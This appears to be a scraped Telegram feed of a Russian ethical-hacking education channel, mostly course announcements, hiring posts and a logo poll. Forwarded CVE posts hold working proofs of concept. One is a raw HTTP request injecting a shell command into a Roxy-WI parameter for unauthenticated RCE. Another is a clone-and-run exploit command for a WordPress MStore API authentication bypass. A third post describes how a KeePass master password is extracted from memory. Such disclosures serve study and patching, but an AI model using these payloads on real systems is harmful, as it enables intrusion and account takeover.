NETRUNNER GROUP
2.98K subscribers
268 photos
32 videos
22 files
164 links
> По вопросам обращаться @TripiniFKYL <
Заместитель - @netrunner_1G
Discord - https://discord.gg/tqmrqRYPW5
Чат - https://t.iss.one/+tkuqqLpFQPVhM2Zi
Сайт - https://cybernetrunner.ru (ведется разработка новой платформы)
Download Telegram
Forwarded from Похек (Сергей Зыбнев)
​​🔴KeePass 2.X Master Password Dumper
CVE-2023-32784

Кратко:
CVE-2023-32784 - это уязвимость в менеджере паролей KeePass. Эта уязвимость позволяет злоумышленнику извлечь мастер-пароль из памяти программного обеспечения, даже когда рабочее пространство заблокировано или больше не работает. Это серьезная уязвимость, так как она может позволить злоумышленнику получить доступ ко всем паролям, хранящимся в базе данных KeePass.

Разбор:
Уязвимость вызвана ошибкой в обработке паролей KeePass. Когда пользователь вводит свой мастер-пароль, KeePass сохраняет его в памяти в открытом виде. Это означает, что пароль не зашифрован и может быть легко прочитан злоумышленником, если у него есть доступ к памяти процесса KeePass. Уязвимость может быть использована злоумышленником, который имеет физический доступ к компьютеру жертвы. Атакующий может использовать инструмент для выгрузки памяти процесса KeePass, а затем искать мастер-пароль в выгрузке. Как только злоумышленник получит мастер-пароль, он сможет получить доступ ко всем паролям, хранящимся в базе данных KeePass.

Исправление:
Уязвимость была исправлена в KeePass 2.54. Пользователи, использующие более старую версию KeePass, должны обновиться до 2.54, чтобы защитить себя от этой уязвимости.

#CVE #critical
👍63❤‍🔥2🔥2
"Что такое этот ваш Netrunner" V.2? 🤔
Информация для новоприбывших и тех кто тут потерялся.

Мы дружное сообщество этичных хакеров и тех кто по-настоящему любит ИБ

Что мы можем вам предложить?

1. Контент от нашей команды редакторов, авторские статьи, разбор кейсов, контент от партнеров)
2. Предоставляем авторские курсы для новичков, с самой востребованной информацией на рынке.
3. Партнерство, мы открыты к интересным предложениям с вашей стороны)
4. Отсутствие рекламы, в данный момент мы только лишь рекомендуем наших партнеров.
5. Возобновляем YouTube и VK, подписывайтесь!
Там будет выходить эксклюзивный контент👌
6. Так же у нас есть чат к в котором вы получите помощь и теплое общение)

По всем вопросам: @netrunner_1G
Партнерство: @TripiniFKYL

P.S. С любовью, команда NR)
Please open Telegram to view this post
VIEW IN TELEGRAM
👍105😍3🔥2
NetRunner ищет новые кадры к себе в команду

Мы станем вашим трамплином в профессиональную деятельность

Нам нужны:
- Начинающий Web-дизайнер креативщик (Figma)
- SMMщик для YouTube
- Начинающий маркетолог
- Монтажер

Контакты для связи: @netrunner_1G
👍4🤔4❤‍🔥3😍2
Forwarded from Похек (Сергей Зыбнев)
​​🔴Roxy WI v6.1.0.0 Unauthenticated Remote Code Execution (RCE) via subprocess_execute
CVE-2022-31137

Это уязвимость удаленного выполнения кода в Roxy-WI, веб-интерфейсе для управления серверами Haproxy, Nginx, Apache и Keepalived. Уязвимость вызвана неправильной обработкой пользовательского ввода в файле /app/options.py. Злоумышленник может использовать эту уязвимость, отправив специально подготовленный HTTP-запрос, который содержит вредоносный код. Вредоносный код будет выполнен на уязвимой системе с привилегиями пользователя, запускающего Roxy-WI.

PoC:
POST /app/options.py HTTP/1.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://192.168.1.44
Referer: https://192.168.1.44/app/login.py
Connection: close

show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=
";id+##&backend_server=127.0.0.1

#CVE #POC
7
Forwarded from RESOLUTE ATTACK
⬜️PH DAYS 12 BY RESOLUTE ATTACK

Видеообзор мероприятия от лица нашей команды. Positive technologies, Codeby, Innostage и другие известные компании.

🔥Победители и призёры STANDOFF: Codeby, True0xA3, Bulba Hackers. Интервью с победителями соревнования. Участники мероприятия. Розыгрыш фирменных футболок.

И многое другое в нашем видеоролике - https://youtu.be/MYfDoC2JC4M
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥32
Всем обучающимся или будущим абитуриентам курса подготовки к PRTT

По завершению второго и третьего месяца обучения на нашем курсе, будет проходить отбор из лучших учеников  для практики, c нашими ведущими специалистами из отдела Pentest.

🟢На практике вы получите:
1. Доступ к реальным кейсам компании
2. Личные практические задания
3. Корпоративный контент

❗️По мнению нашей команды практика лучший способ погрузиться в профессию!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9❤‍🔥5🔥3😍2
Forwarded from Похек (Сергей Зыбнев)
MStore API <= 3.9.2 - Authentication Bypass
CVE-2023-2732

Плагин MStore API для WordPress уязвим для обхода аутентификации в версиях до 3.9.2 включительно. Это связано с недостаточной проверкой пользователя во время REST API запроса на добавление объявлений через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например администратора, если у них есть доступ к идентификатору пользователя.

PoC:
git clone https://github.com/RandomRobbieBF/CVE-2023-2732 ; pip3 install -r requirements.txt ; python3 mstore-api.py -u https://TARGET


#CVE #POC
9👍3
Новости которые у нас есть для вас и ситуация у нас во внутренней кухне.

Начнем с позитивного. Есть несколько хороших новостей.

1) Мы разрабатываем свою обучающую платформу. Чуть позже покажем дизайн. Он вам очень понравится.
Мы развиваемся и совершенствуемся, чтобы предоставлять вам качественные материалы и полную поддержку.

2) Для участников нашего курса ведется разработка бесплатного дополнения (по желаниям самих учеников) и не только

Теперь немного о грустном:
Вследствие некоторых обстоятельств уже бывший сотрудник попытался нас шантажировать и после неудачной попытки попытался распространить материалы курса. Меры приняты, утечку локализовали.

Оказалось, что с подобными сотрудниками информация - в опасности. Не все могут работать в области информационной безопасности 😒 Коммерческая тайна, конфиденциальность, да и просто человеческое доверие для некоторых - пустой звук.

Большое спасибо всем участникам текущего потока за поддержку и понимание нашей команды. Мы вас любим и ценим! Грустно, когда предают.

С уважением, команда NetRunner ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
👍178🤔6❤‍🔥3
Forwarded from linkmeup
Отлично! Теперь шелл можно и через SMS пропихнуть.
Пока безопасники бьются с DLP, настраивают политики и заливают порты эпоксидкой, просто отправь SMS на номер.TCPoverSMS, my ass.
https://github.com/persistent-security/SMShell
🔥11👍3
Forwarded from RESOLUTE ATTACK
Тут говорят новый поток PRTT планируют в Октябре запустить
👍9🔥54
Всем привет, очередные новости от NetRunner
 
Во первых, хотелось бы рассказать о нашем оффлайн проекте. ⬇️

Так как наша задача - популяризация ИБ, мы организуем кружки на базе школ для учеников. Первый запуск пройдет в городе Новосибирск.
В следующем году будем открывать в популярных городах России.

📌Так же представляем вашему вниманию наш курс по по подготовке к PRTT на платформе наших друзей и партнеров из CyberYozh. Курс будет проходить на платформе CyberYozh Academy название курса "WEB pentest base". В курсе 24 модуля и 31 практическое задание. Курс будет по сниженной цене, без менторства.

Наверняка уже все заметили что у нас поменялся логотип канала. На днях мы выпустим пост с логотипами и проведем голосование за лучший логотип Netrunner на ваш выбор.

❗️Просим проявить максимальную активность в голосовании
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥15🔥93👍1
Подборка из вариантов логотипа NetRunner
Как и обещали выкатываем голосование, все зависит от вас ☺️
Please open Telegram to view this post
VIEW IN TELEGRAM
Что вам нравится больше?
Anonymous Poll
9%
1
6%
2
6%
3
11%
4
23%
5
56%
6
27%
7
👍1
Доброго вечера друзья, и мы опять спешим вас порадовать

Совместно с компанией CyberYozh мы на днях анонсируем серьезный курс посвящённый взлому инфраструктуры компаний, так же из тем будут присутствовать:
1) Естественно анонимность и создание своего окружения, лаборатории
2) Криптовалюта, анонимное использование и тд.
3) Девайсы для хакера и как ими пользоваться
4) Социальная инженерия
5) Форензика
6) Монетизация своих знаний

Забавную отсылку можно найти тут)
__

Новости по кусу "Подготовка к PRTT"

📣Вот и завершился первый месяц нашего курса "Подготовки к PRTT", Если хотите узнать мнение наших учеников, их отзывы будут на картинке в комментариях⬇️

Не смотря на все сложности которые мы уже преодолели, мы уделяем каждому ученику внимание и воспитываем этичных хакеров.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍103🔥3